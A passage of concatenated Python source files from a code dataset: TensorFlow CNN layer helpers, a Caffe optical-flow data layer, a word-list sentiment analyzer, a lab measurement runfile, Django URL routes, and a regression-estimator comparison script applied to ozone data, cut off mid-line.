ret.append(n)\r\n    return ret\r\n\r\n","sub_path":"code/batch-2/vse-naloge-brez-testov/DN6-M-113.py","file_name":"DN6-M-113.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"547720855","text":"import tensorflow as tf\n\n\nWINDOW_SIZE = 5\n\nINPUT_CHANNELS = 3\nOUTPUT_CHANNELS = 64\n\n\ndef add_variable_summaries(variable, name):\n    tf.histogram_summary(\"%s/histogram\" % name, variable)\n\n\ndef convo_op(image, window_size, input_channels, output_channels, name=\"\"):\n    \"\"\"Create a convolutional layer\n\n    Args:\n        image: image tensor\n        window_size: height and width of the window\n        input_channels: number of channels from input\n        output_channels: number of channels from output\n\n    Returns:\n        convolutional layer\n    \"\"\"\n\n    # create weight for the window\n    # window has size window_size x window_size,\n    # with input_channels inputs and output_channels feature maps\n    convo_weights = tf.Variable(\n        tf.truncated_normal([\n            window_size,\n            window_size,\n            input_channels,\n            output_channels\n        ], stddev=0.01, dtype=tf.float32),\n        name=\"%s_weights\" % name)\n    add_variable_summaries(convo_weights, \"%s_weights\" % name)\n\n    convo_biases = tf.Variable(\n        tf.zeros([\n            output_channels\n        ], dtype=tf.float32),\n        name=\"%s_biases\" % name)\n    add_variable_summaries(convo_biases, \"%s_biases\" % name)\n\n    # convolve over the image\n    # output image has the same size as the input\n    convo = tf.nn.conv2d(image, convo_weights,\n                         strides=[1, 1, 1, 1],\n                         padding=\"SAME\", name=\"%s_convo\" % name)\n\n    # add biases to each convolved output pixel\n    bias = tf.nn.bias_add(convo, convo_biases, name=\"%s_bias\" % name)\n\n    # non-linear function\n    # using sigmoid here\n    non_linear = tf.sigmoid(bias, name=name)\n\n    return non_linear\n\n
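# Editorial usage sketch (assumes the TF 0.x-era API used throughout this file):\n#   images = tf.placeholder(tf.float32, [None, 32, 32, 3])\n#   conv1 = convo_op(images, WINDOW_SIZE, INPUT_CHANNELS, OUTPUT_CHANNELS, name=\"conv1\")\n# With SAME padding and stride 1, conv1 keeps the 32x32 spatial size while\n# widening the channel axis from 3 to 64.\n\n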
\ndef max_pool_layer(image, window_size, strides, name=\"\"):\n    \"\"\"Create max pooling layer\n    Args:\n        image: image tensor (a batch of images)\n        window_size: size of the pooling window\n\n    Returns:\n        max pooling layer\n    \"\"\"\n\n    return tf.nn.max_pool(\n        image,\n        ksize=[1, window_size, window_size, 1],\n        strides=[1, strides, strides, 1],\n        padding=\"VALID\",\n        name=name\n    )\n\n\ndef full_connected_hidden_layer(\n        x,\n        input_len,\n        hidden_units,\n        stddev,\n        non_linear_op,\n        name=\"\"):\n    \"\"\"Create a fully connected hidden layer\n    Args:\n        x: 1-D input vector\n        input_len: input's dimension\n        hidden_units: number of hidden units\n        non_linear_op: non-linear operation\n\n    Returns:\n        Hidden layer output\n    \"\"\"\n\n    # weight matrix with shape (input_len, hidden_units)\n    weights = tf.Variable(\n        tf.truncated_normal(\n            [input_len, hidden_units],\n            mean=0.0,\n            stddev=stddev,\n            dtype=tf.float32\n        ),\n        name=\"%s_weights\" % name\n    )\n    add_variable_summaries(weights, \"%s_weights\" % name)\n\n    # biases\n    biases = tf.Variable(\n        tf.zeros([hidden_units], dtype=tf.float32),\n        name=\"%s_biases\" % name\n    )\n    add_variable_summaries(biases, \"%s_biases\" % name)\n\n    # affine transformation\n    affine_transformation = tf.matmul(x, weights) + biases\n\n    # non-linear transformation\n    non_linear_transformation = non_linear_op(\n        affine_transformation,\n        name=name\n    )\n    add_variable_summaries(non_linear_transformation, \"%s_activation\" % name)\n\n    return non_linear_transformation\n\n\ndef output_layer(\n        x,\n        y,\n        input_len,\n        hidden_units,\n        stddev,\n        name=\"\"):\n    \"\"\"Output using softmax layer\n    \"\"\"\n\n    # weight matrix with shape (input_len, hidden_units)\n    weights = tf.Variable(\n        tf.truncated_normal(\n            [input_len, hidden_units],\n            mean=0.0,\n            stddev=stddev,\n            dtype=tf.float32\n        ),\n        name=\"%s_weights\" % name\n    )\n    add_variable_summaries(weights, \"%s_weights\" % name)\n\n    # biases\n    biases = tf.Variable(\n        tf.zeros([hidden_units], dtype=tf.float32),\n        name=\"%s_biases\" % name\n    )\n    add_variable_summaries(biases, \"%s_biases\" % name)\n\n    # affine transformation\n    logits = tf.matmul(x, weights) + biases\n\n    labels = tf.cast(y, tf.int64)\n\n    return tf.nn.sparse_softmax_cross_entropy_with_logits(\n        logits,\n        labels, name=name)\n\n\ndef loss_layer(predicted, actual):\n    \"\"\"Calculate loss function with maximum likelihood\n\n    Args:\n        predicted: predicted value\n        actual: actual value\n\n    Returns:\n        loss value\n    \"\"\"\n\n    return tf.reduce_mean(\n        -tf.reduce_sum(\n            actual * tf.log(predicted),\n            reduction_indices=[1]),\n        name=\"loss_function\"\n    )\n","sub_path":"cifar/src/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"248860563","text":"#!/usr/bin/python\n\nfrom CaffeAdapter import *\nfrom caffe.proto import caffe_pb2 as Proto\nfrom pymill import Toolbox as tb\nimport os\n\n\ndef PhilData_OpticalFlow(net, **kwargs):\n    '''\n    @brief Setup PhilDataLayer for optical flow\n    @returns A list of layer output blobs\n    '''\n    data_param = {'source' : kwargs['source'],\n                  'backend' : Params.Data.LMDB,\n                  'batch_size' : kwargs['batch_size'],\n                  'encoding' : (Proto.DataParameter.UINT8,\n                                Proto.DataParameter.UINT8,\n                                Proto.DataParameter.UINT16FLOW,\n                                Proto.DataParameter.BOOL1),\n                  'slice_point': (3, 6, 8),\n                  'verbose' : kwargs['verbose'],\n                  'rand_permute' : kwargs['rand_permute'],\n                  'rand_permute_seed' : kwargs['rand_permute_seed']}\n\n    if 'preselection_file' in kwargs: data_param['preselection_file'] = kwargs['preselection_file']\n    if 'preselection_label' in kwargs: data_param['preselection_label'] = kwargs['preselection_label']\n\n    ## Always returns (img_from, img_to, flow, occlusion)\n    return Layers.PhilData(net, nout=4,\n                           include=(Proto.NetStateRule(phase=kwargs['phase']),),\n                           data_param=data_param)\n\n
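# Editorial usage sketch ('train_lmdb' is a hypothetical path; everything else\n# comes from this module): a four-blob optical-flow input can be declared as\n#   img_from, img_to, flow, occ = PhilData(net, source='train_lmdb', batch_size=8)\n# PhilData() defined below fills in the defaults and forwards to the function above.\n\n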
\ndef PhilData(net, **kwargs):\n    '''\n    @brief Setup network inputs by instantiating a PhilDataLayer\n    @returns A list of single-blob network INPUT and LABEL\n    '''\n\n    if 'source' not in kwargs:\n        raise Exception('PhilData requires parameter >source<')\n\n    if not os.path.exists(kwargs['source']):\n        raise Exception('PhilData: >source< %s does not exist'\n                        %(kwargs['source']))\n\n    def default(arg, val):\n        if not arg in kwargs:\n            kwargs[arg] = val\n\n    default('phase', 'TRAIN')\n    default('batch_size', 1)\n    default('verbose', True)\n    default('rand_permute', True)\n    default('rand_permute_seed', 77)\n\n    if kwargs['phase'] == 'TEST': kwargs['phase'] = Proto.TEST\n    if kwargs['phase'] == 'TRAIN': kwargs['phase'] = Proto.TRAIN\n\n    return PhilData_OpticalFlow(net, **kwargs)\n","sub_path":"python/pymill/CNN/Definition/PhilData.py","file_name":"PhilData.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"289401200","text":"import sys\nimport re\nfrom utils_plot import Utilities\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport matplotlib.dates as mdates\n\nimport matplotlib\nimport pandas as pd\nimport csv\nimport os\n\n\n# import importlib\n# importlib.reload(sys)\nreload(sys) \nsys.setdefaultencoding('utf-8')\n\nclass Analyzer(object):\n    def __init__(self, group):\n        self.group = group\n        self.display = (self.group == \"event_id\")\n\n        # Load the positive and negative words\n        self.words = {}\n        with open(\"words/positive.txt\") as file:\n            for line in file:\n                self.words[line.rstrip()] = 1\n        with open(\"words/negative.txt\") as file:\n            for line in file:\n                self.words[line.rstrip()] = -1\n\n    def analyze(self, message):\n        score = 0\n        found = 0\n        disp = \"\"\n\n        i = 0\n        # Utilities.split raises AttributeError for a None message;\n        # main() filters those records out before calling analyze().\n        parts = Utilities.split(message)\n\n        for w in parts:\n            if w in self.words:\n                score += self.words[w]\n                found += 1\n                if self.display:\n                    i = message.lower().find(w, i)\n                    d = Utilities.get_colored_text(self.words[w], message[i:i+len(w)])\n                    message = message[:i] + d + message[i+len(w):]\n                    i = i + len(d)\n\n                    disp += d + \" \"\n\n        label = score / float(found) if found != 0 else 0.0\n        return (label, disp, message)\n\n    def output(self, group, message, label, disp, time):\n        f = open('result.txt','a')\n        f.write(\"{}\\t{:.2f}\".format(time,label))\n        f.write('\\n')\n        f.close()\n\n    def reprocess(self, name):\n        dataframe = pd.read_csv(name)\n        dataframe = dataframe.groupby('repo').sum()\n\n        new_name = name[:-4] + '_pcsed.csv'\n        dataframe.to_csv(new_name,index=True,sep=',')\n\n    # plot function needs to be rewritten using csv\n    def plot(self):\n        f = open('result.txt','r')\n\n        plt.figure(figsize=(20,6))\n        dates = []\n        Y1 = []\n        for line in f.readlines():\n            dates.append(line.split('\\t')[0])\n            Y1.append(float(line.split('\\t')[1]))\n\n        f.close()\n        X=range(len(dates))\n\n        # plt.bar(X, Y1, width = 0.35,facecolor = 'lightskyblue',edgecolor = 'white')\n        plt.plot(X, Y1, 'co-')\n        # plt.bar(X,Y1,width = 0.35,facecolor = 'lightskyblue',edgecolor = 'white')\n        plt.xticks(X,dates,rotation=25)\n        plt.margins(0.08)\n        plt.subplots_adjust(bottom=0.15)\n        plt.xlabel('time')\n        plt.ylabel('rate')\n\n        plt.show()\n\n
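# Editorial sketch (not in the original): each result.txt row is time + '\\t' +\n# label, with time formatted as YYYY-MM-DD HH:MM:SS, so plot() could parse real\n# datetimes instead of plotting against range(len(dates)):\n#   xs = [datetime.strptime(d, '%Y-%m-%d %H:%M:%S') for d in dates]\n#   plt.plot(xs, Y1, 'co-')\n# (datetime and matplotlib.dates are already imported above.)\n\n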
def main(argv):\n    path = argv[0]\n\n    group = \"id\"\n    analyzer = Analyzer(\"id\")\n    f = open(path,'r')\n\n    for data in Utilities.read_json(f, group=group):\n\n        # data['message'] -- text, data['group'] -- id\n        # print(data)\n        if data['message'] is None: continue\n\n        (label, disp, message) = analyzer.analyze(data[\"message\"])\n        group = data[\"group\"] if \"group\" in data else \"\"\n\n        raw_time = data['time']\n        time = re.findall(r\"(.+?)T\",raw_time)[0]+' '+re.findall(r\"T(.+?)Z\",raw_time)[0]\n\n        # repo = data['repo']\n\n        analyzer.output(group, message, label, disp, time)\n        # analyzer.output(group, message, label, disp)\n\n    # analyzer.plot()\n    # analyzer.reprocess(name)\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","sub_path":"analyze_plot.py","file_name":"analyze_plot.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"538477466","text":"#Runfile for 06-07-15\n\n\n#Reconfirm that the correlations come back\nagi_off() \nsinglet_pos_vec = [0.098,0.105,0.0005]\n# AWG_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 0.05)\n# AWG_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 50e-6)\n\n\n#with new version of AGI\n# singlet_pos_vec = [0.102,0.107,0.00025]\n# Fast_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 0)\n\n#with old version of AGI\n# singlet_pos_vec = [0.09,0.12,0.001]\n# Fast_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 0)\n\n#Again with new version of AGI so ramp can be implemented.\n# singlet_pos_vec = [0.09,0.108,0.001]\n# Fast_dual_Load_Move(reps = 2, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 1e-6)\n\n#with old version of AGI\n# singlet_pos_vec = [0.09,0.12,0.002]\n# Fast_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 0)\n\n\n#Do a map with the older version of the AGI without the ramp function\nsinglet_wait_vec = logspace(log10(1e-9),log10(50e-6),15).tolist()\nsinglet_pos_vec = [0.096,0.105,0.00025]\nFast_dual_Load_Map(reps = 4, shots=200, bdown=False, cdown=True)","sub_path":"bilby/aff_scripts/dev053/dev53_run_06_7_15.py","file_name":"dev53_run_06_7_15.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"325647966","text":"from django.urls import include, path\nfrom rest_framework.routers import SimpleRouter\n\nfrom .views import (FavoriteView, IngredientView, RecipeView,\n                    ShoppingCartDownloadView, ShoppingCartView, SubscribeView,\n                    SubscriptionsView, TagView)\n\nmain_router = SimpleRouter()\nmain_router.register(\"tags\", TagView)\nmain_router.register(\"ingredients\", IngredientView)\nmain_router.register(\"recipes\", RecipeView)\n\nurlpatterns = [\n    path(\n        \"users/subscriptions/\",\n        SubscriptionsView.as_view({\"get\": \"list\"}),\n        name=\"subscriptions\",\n    ),\n    path(\n        \"users/<int:user_id>/subscribe/\", SubscribeView.as_view(), name=\"subscribe\"\n    ),\n    path(\n        \"recipes/<int:recipe_id>/favorite/\", FavoriteView.as_view(), name=\"favorite\"\n    ),\n    path(\n        \"recipes/<int:recipe_id>/shopping_cart/\",\n        ShoppingCartView.as_view(),\n        name=\"shopping_cart\",\n    ),\n    path(\n        \"recipes/download_shopping_cart/\",\n        ShoppingCartDownloadView.as_view(),\n        name=\"download_shopping_cart\",\n    ),\n    path(\"\", include(main_router.urls)),\n]\n
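# Editorial sketch (assumes a hypothetical /api/ mount point for this module,\n# and the int converters used in the paths above):\n#   reverse(\"favorite\", kwargs={\"recipe_id\": 1})  ->  \"/api/recipes/1/favorite/\"\n# The SimpleRouter contributes the standard list/detail routes for tags,\n# ingredients and recipes on top of the explicit paths above.\n\n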
","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"140420172","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 10:22:24 2019\n\n@author: mjr583\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 10:07:19 2019\n\n@author: mjr583\n\"\"\"\n\n\"\"\"Demonstrate how to calculate various linear regression estimates.\nCopyright (C) 2019 Mikko Pitkanen\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see <https://www.gnu.org/licenses/>.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.odr\nimport pystan\nimport statsmodels.formula.api as smf\nimport scipy as sc\nfrom sklearn.decomposition import PCA\n\n\ndef bayes_ols_fit(xi, yi):\n    \"\"\"Perform non-weighted OLS regression using Bayesian inference.\n    This model does not take into account the uncertainties in the data, for a\n    model that properly takes into account the uncertainties see, for example,\n    Stan manual\n    https://mc-stan.org/docs/2_19/stan-users-guide/bayesian-measurement-error-model.html\n    (valid on 2019-05-18)\n    \"\"\"\n    # define stan model\n    model = \"\"\"\n    data {\n      int N; // number of cases\n      vector[N] x;\n      vector[N] y; // outcome (variate)\n      real sigma; // outcome noise\n    }\n    parameters {\n      real intercept;\n      real slope;\n    }\n    model {\n      y ~ normal(intercept + slope * x, sigma);\n    }\n    \"\"\"\n\n    n = len(xi)\n    ind = np.arange(n)\n\n    # formalize input data\n    data = {\n        'N': n,\n        'x': xi[ind],\n        'y': yi[ind],\n        'sigma': np.std(yi)}\n\n    sm_OLS = pystan.StanModel(model_code=model)\n\n    # make OLS fit to get initial guesses for slope and intercept\n    slope_ols, intercept_ols = np.polyfit(xi, yi, 1)\n\n    fit = sm_OLS.sampling(\n        data=data,\n        iter=1000,\n        chains=4,\n        init=lambda: {\n            'x': xi[ind],\n            'y': yi[ind],\n            'slope': slope_ols,\n            'intercept': intercept_ols},\n        algorithm=\"NUTS\",\n        n_jobs=4)\n\n    # find the index for maximum a posteriori (MAP) values\n    samples = fit.extract(permuted=True)\n    lp = samples['lp__']\n    MAPindex = np.argmax(lp)\n\n    # use MAP values for slope and intercept\n    slope = samples['slope'][MAPindex]\n    intercept = samples['intercept'][MAPindex]\n\n    return slope, intercept\n\n
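# Editorial note (sketch, not in the original):\n#   slope, intercept = bayes_ols_fit(x, y)\n# picks the posterior draw with the highest log-density (lp__) as a MAP point\n# estimate; posterior means and credible intervals from fit.extract() would\n# give a fuller summary.\n\n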
\ndef bivariate_fit(xi, yi, dxi, dyi, ri=0.0, b0=1.0, maxIter=1e6):\n    \"\"\"Perform bivariate regression by York et al. 2004.\n    This is an implementation of the line fitting algorithm presented in:\n    York, D et al., Unified equations for the slope, intercept, and standard\n    errors of the best straight line, American Journal of Physics, 2004, 72,\n    3, 367-375, doi = 10.1119/1.1632486\n    See especially Section III and Table I. The enumerated steps below are\n    citations to Section III\n    Parameters:\n        xi, yi      np.array, x and y values\n        dxi, dyi    np.array, errors for the data points xi, yi\n        ri          float, correlation coefficient for the weights\n        b0          float, initial guess for slope\n        maxIter     float, maximum allowed number of iterations. this is to escape\n                    possible non-converging iteration loops\n    Returns:\n        b           slope estimate\n        a           intercept estimate\n        S           goodness-of-fit estimate\n        cov         covariance matrix of the estimated slope and intercept values\n    \"\"\"\n    # (1) Choose an approximate initial value of b\n    # make OLS fit to get the initial guesses for slope\n    slope_ols, intercept_ols = np.polyfit(xi, yi, 1)\n    b = slope_ols\n\n    # (2) Determine the weights wxi, wyi, for each point.\n    wxi = 1.0 / dxi**2.0\n    wyi = 1.0 / dyi**2.0\n\n    alphai = (wxi * wyi)**0.5\n    b_diff = 999.0\n\n    # tolerance for the fit, when b changes by less than tol for two\n    # consecutive iterations, fit is considered found\n    tol = 1.0e-8\n\n    # iterate until b changes less than tol\n    iIter = 1\n    while (abs(b_diff) >= tol) & (iIter <= maxIter):\n\n        b_prev = b\n\n        # (3) Use these weights wxi, wyi to evaluate Wi for each point.\n        Wi = (wxi * wyi) / (wxi + b**2.0 * wyi - 2.0*b*ri*alphai)\n\n        # (4) Use the observed points (xi ,yi) and Wi to calculate x_bar and\n        # y_bar, from which Ui and Vi , and hence betai can be evaluated for\n        # each point\n        x_bar = np.sum(Wi * xi) / np.sum(Wi)\n        y_bar = np.sum(Wi * yi) / np.sum(Wi)\n\n        Ui = xi - x_bar\n        Vi = yi - y_bar\n\n        betai = Wi * (Ui / wyi + b*Vi / wxi - (b*Ui + Vi) * ri / alphai)\n\n        # (5) Use Wi, Ui, Vi, and betai to calculate an improved estimate of b\n        b = np.sum(Wi * betai * Vi) / np.sum(Wi * betai * Ui)\n\n        # (6) Use the new b and repeat steps (3), (4), and (5) until successive\n        # estimates of b agree within some desired tolerance tol\n        b_diff = b - b_prev\n\n        iIter += 1\n\n    # (7) From this final value of b, together with the final x_bar and y_bar,\n    # calculate a from\n    a = y_bar - b * x_bar\n\n    # Goodness of fit\n    S = np.sum(Wi * (yi - b*xi - a)**2.0)\n\n    # (8) For each point (xi, yi), calculate the adjusted values xi_adj\n    xi_adj = x_bar + betai\n\n    # (9) Use xi_adj, together with Wi, to calculate xi_adj_bar and thence ui\n    xi_adj_bar = np.sum(Wi * xi_adj) / np.sum(Wi)\n    ui = xi_adj - xi_adj_bar\n\n    # (10) From Wi , xi_adj_bar and ui, calculate sigma_b, and then sigma_a\n    # (the standard uncertainties of the fitted parameters)\n    sigma_b = np.sqrt(1.0 / np.sum(Wi * ui**2))\n    sigma_a = np.sqrt(1.0 / np.sum(Wi) + xi_adj_bar**2 * sigma_b**2)\n\n    # calculate covariance matrix of slope and intercept (York et al.,\n    # Section II)\n    cov = -xi_adj_bar * sigma_b**2\n    # [[var(b), cov], [cov, var(a)]]\n    cov_matrix = np.array(\n        [[sigma_b**2, cov], [cov, sigma_a**2]])\n\n    if iIter <= maxIter:\n        return b, a, S, cov_matrix\n    else:\n        print(\"bivariate_fit() exceeded maximum number of iterations, \" +\n              \"maxIter = {:}\".format(maxIter))\n        return np.nan, np.nan, np.nan, np.nan\n\n
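# Editorial usage sketch (x, y, dx, dy as prepared in __main__ below):\n#   b, a, S, cov = bivariate_fit(x, y, dx, dy, b0=0.0)\n# For a well-specified model, S is approximately chi-square distributed with\n# N - 2 degrees of freedom, which makes it a quick goodness-of-fit check.\n\n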
\ndef deming_fit(xi, yi):\n    \"\"\"Perform Deming regression.\n    Nomenclature follows:\n    Francq, Bernard G., and Bernadette B. Govaerts. 2014. \"Measurement Methods\n    Comparison with Errors-in-Variables Regressions. From Horizontal to\n    Vertical OLS Regression, Review and New Perspectives.\" Chemometrics and\n    Intelligent Laboratory Systems. Elsevier.\n    doi:10.1016/j.chemolab.2014.03.006.\n    Parameters:\n        xi, yi      np.array, x and y values\n    Returns:\n        slope       regression slope estimate\n        intercept   regression intercept estimate\n    \"\"\"\n    Sxx = np.sum((xi - np.mean(xi)) ** 2)\n    Syy = np.sum((yi - np.mean(yi)) ** 2)\n    Sxy = np.sum((xi - np.mean(xi)) * (yi - np.mean(yi)))\n    lambda_xy = (np.var(yi) / np.size(yi)) / (np.var(xi) / np.size(xi))\n\n    slope = (Syy - lambda_xy * Sxx +\n             np.sqrt((Syy - lambda_xy * Sxx) ** 2 +\n                     4 * lambda_xy * (Sxy ** 2))) / (2 * Sxy)\n\n    intercept = np.mean(yi) - slope * np.mean(xi)\n\n    return slope, intercept\n\n\ndef odr_fit(xi, yi, dxi, dyi):\n    \"\"\"Perform weighted orthogonal distance regression.\n    https://docs.scipy.org/doc/scipy/reference/odr.html (valid on 2019-04-16)\n    Parameters:\n        xi, yi      np.array, x and y values\n        dxi, dyi    np.array, x and y errors\n    Returns:\n        slope       regression slope estimate\n        intercept   regression intercept estimate\n    \"\"\"\n    def f(B, x):\n        \"\"\"Define linear function y = a * x + b for ODR.\n        Parameters:\n            B       [slope, intercept]\n            x       x values\n        \"\"\"\n        return B[0] * x + B[1]\n\n    # define the model for ODR\n    linear = scipy.odr.Model(f)\n\n    # formalize the data\n    data = scipy.odr.RealData(\n        xi,\n        yi,\n        sx=dxi,\n        sy=dyi)\n\n    # make OLS fit to get initial guesses for slope and intercept\n    slope_ols, intercept_ols = np.polyfit(xi, yi, 1)\n\n    # instantiate ODR with your data, model and initial parameter estimate\n    # use OLS regression coefficients as initial guess\n    odr = scipy.odr.ODR(\n        data,\n        linear,\n        beta0=[slope_ols, intercept_ols])\n\n    # run the fit\n    output = odr.run()\n    slope, intercept = output.beta\n\n    return slope, intercept\n\n\ndef pca_fit(xi, yi):\n    \"\"\"Estimate principal component regression fit to xi, yi data.\n    See eg. https://shankarmsy.github.io/posts/pca-vs-lr.html (valid on\n    2019-04-17)\n    Parameters:\n        xi, yi      x and y data points\n    Returns:\n        slope       slope b of y = a + bx\n        intercept   y-intercept a\n    Example:\n        slope, intercept = pca_fit(xi, yi)\n    \"\"\"\n    xy = np.array([xi, yi]).T\n\n    pca = PCA(n_components=1)\n    xy_pca = pca.fit_transform(xy)\n\n    xy_n = pca.inverse_transform(xy_pca)\n    slope = (xy_n[0, 1] - xy_n[1, 1])/(xy_n[0, 0] - xy_n[1, 0])\n    intercept = xy_n[0, 1] - slope * xy_n[0, 0]\n\n    return slope, intercept\n\n\ndef quantile_fit(xi, yi, q=0.5):\n    \"\"\"Perform quantile regression.\n    See for instance:\n    https://www.statsmodels.org/dev/examples/notebooks/generated/quantile_regression.html\n    (valid on 2019-04-16)\n    Parameters:\n        xi, yi      np.array, x and y values\n    Returns:\n        slope       regression slope estimate\n        intercept   regression intercept estimate\n        cov         covariance matrix of the estimates\n    \"\"\"\n    data = {'xi': xi, 'yi': yi}\n\n    df = pd.DataFrame.from_dict(data=data)\n\n    mod = smf.quantreg('yi ~ xi', df)\n    res = mod.fit(q=q)\n\n    # return slope, intercept, covariance_matrix\n    return res.params['xi'], res.params['Intercept'], res.cov_params().values\n\n\nif __name__ == \"__main__\":\n    \"\"\"Demonstrate statistical inference using linear regression line fitting.\n    Purpose: make linear regression with different estimators on x and y data\n    with uncertainties. The correct linear model is y = 1.5x - 2.0. 
Try and\n answer:\n - which of the estimators is the best and why?\n - which of the methods consider x and y uncertainty and which ones don't?\n Also, try to replace x, y, dx and dy with your own data.\n Please note, that some methods, like OLS, have limitations that make it\n unsuitable/not optimal for this particular task!\n The script has been tested in a conda environment (see\n https://www.anaconda.com/distribution/#download-section for more info on\n that):\n conda create --name ito python=3.7 numpy==1.16.2 matplotlib==3.0.3 pandas==0.24.2 ipython==7.4.0 pystan==2.17.1.0 scipy==1.2.1 scikit-learn==0.20.3 statsmodels==0.9.0\n On linux you can run this from the command line by calling:\n python regression_estimators.py\n You can run this in Ipython by calling:\n run regression_estimators.py\n \"\"\"\n # define absolute and relative standard uncertainties for x and y data sets\n sigma_x_abs = 0.1\n sigma_x_rel = 0.05\n sigma_y_abs = 0.1\n sigma_y_rel = 0.05\n\n # define the real regression parameters\n slope_true=0#1.5\n intercept_true=1800\n\n # define test data set points. These were generated with\n # 1. create normally distributed and independent random x values\n # 2. y = slope_true * x + intercept_true\n # 3. add normally distributed and independent random noise to x and y\n \n filepath = '/users/mjr583/scratch/NCAS_CVAO/CVAO_datasets/'\n savepath = '/users/mjr583/scratch/NCAS_CVAO/plots/'\n \n filen = filepath+'20191007_CV_Merge.csv'\n df = pd.read_csv(filen, index_col=0,dtype={'Airmass':str})\n df.index = pd.to_datetime(df.index,format='%d/%m/%Y %H:%M')\n \n cols = list(df) \n for col in cols:\n try:\n df[col] = df[col].loc[~(df[col] <= 0.)]\n except:\n pass\n \n ## in test case just use Ozone data for now\n start_year='2007'\n years = np.arange(2007, 2020)\n spec = 'O3'\n data = df[spec][start_year:]\n data['2009-07-01' : '2009-09-30'] = np.nan\n nyears = len((data.resample('Y').mean()).index.year)\n daily = data.resample('D').mean()\n \n y = np.array(daily)\n x = np.arange(len(y))\n\n idx=np.isfinite(y)\n y = y[idx]\n x = x[idx]\n \n '''\n x = np.array([\n 7.02490389, 5.84673882, 6.22362901, 5.89447501, 6.50522957,\n 5.80298616, 6.17497626, 6.57451761, 6.47010046, 6.04077582,\n 5.90118102, 6.77270208, 6.43396724, 6.41136767, 6.12493598,\n 5.90716534, 6.32037763, 7.39491283, 6.36049059, 5.9670787 ,\n 6.85141919, 6.26910599, 6.20254179, 6.9836126 , 6.63848388,\n 6.21000692, 6.23215349, 6.2068118 , 6.39700798, 5.68460809,\n 6.0957604 , 5.93433827, 6.92329796, 6.87485541, 6.64441035,\n 6.5876272 , 6.21395565, 6.97018765, 5.8405509 , 6.68689768,\n 6.55696236, 5.91300654, 5.77200607, 6.18620691, 6.46252992,\n 5.84408498, 5.72175502, 6.28586177, 6.1426537 , 5.97624839,\n 7.2909262 , 6.26629957, 6.35857082, 6.00486819, 5.96392117,\n 6.79158893, 6.88007737, 5.79147038, 6.32788946, 5.89282374,\n 5.246736 , 6.79574812, 6.57403906, 6.14307375, 7.00910025,\n 5.7563269 , 6.351342 , 6.53075042, 5.71545834, 6.30847149,\n 7.02490349, 6.40364356, 6.16509938, 6.4619477 , 6.70890128,\n 6.51323415, 6.99526207, 5.98790113, 5.92062987, 6.07047262,\n 7.05354862, 5.71384054, 6.60230794, 7.0169052 , 6.36480226,\n 6.31785604, 5.61791288, 6.85937139, 5.75865116, 5.72959174,\n 5.90952266, 6.42005849, 6.93056586, 6.01429019, 6.9796715 ,\n 6.94304459, 6.75550702, 5.66799426, 6.98226771, 6.04554234])\n \n y = np.array([\n 8.40544072, 7.23576875, 7.36491546, 6.0339046 , 7.97447602,\n 7.15119055, 6.54041287, 7.17955333, 7.61995614, 7.45436687,\n 6.51994675, 6.86866468, 7.93039991, 7.96141096, 6.74008807,\n 
6.24162408, 7.56592469, 8.90243085, 7.93080636, 7.69373893,\n 8.1495254 , 7.31618462, 7.38623682, 8.27756635, 7.26490068,\n 7.62419581, 8.09272363, 6.83289432, 7.00903454, 7.32198232,\n 7.76544704, 7.86794507, 7.34049199, 7.16680021, 7.28097398,\n 7.1300533 , 7.56470235, 8.53067913, 6.5722756 , 8.35793814,\n 7.85134993, 6.28578289, 6.78504232, 7.46187614, 7.63509705,\n 7.14787352, 7.76011323, 7.73277699, 6.61017633, 7.04707694,\n 8.11976918, 7.57491045, 7.6502606 , 7.81891365, 7.5169907 ,\n 7.10958076, 8.10664908, 6.41070742, 7.42201405, 7.1440822 ,\n 6.71524939, 8.29542569, 7.40644049, 6.88359516, 8.10013957,\n 6.17323241, 6.89164089, 8.18856187, 6.43704836, 7.1734189 ,\n 7.33072932, 8.21214643, 7.73751715, 7.73084165, 8.5996884 ,\n 8.08276146, 7.83624525, 7.24484867, 6.62742944, 5.95489133,\n 8.05221471, 6.09695074, 8.934238 , 8.4620742 , 7.03271364,\n 6.62512029, 7.76597935, 7.76624445, 6.84164444, 7.15060009,\n 7.05616176, 7.62173155, 8.63441307, 6.77385575, 7.61571327,\n 7.87055929, 8.07943385, 6.48806751, 7.88899205, 7.61359413])\n '''\n # estimate total standard uncertanties for each data point\n dx = np.sqrt((x * sigma_x_rel)**2 + 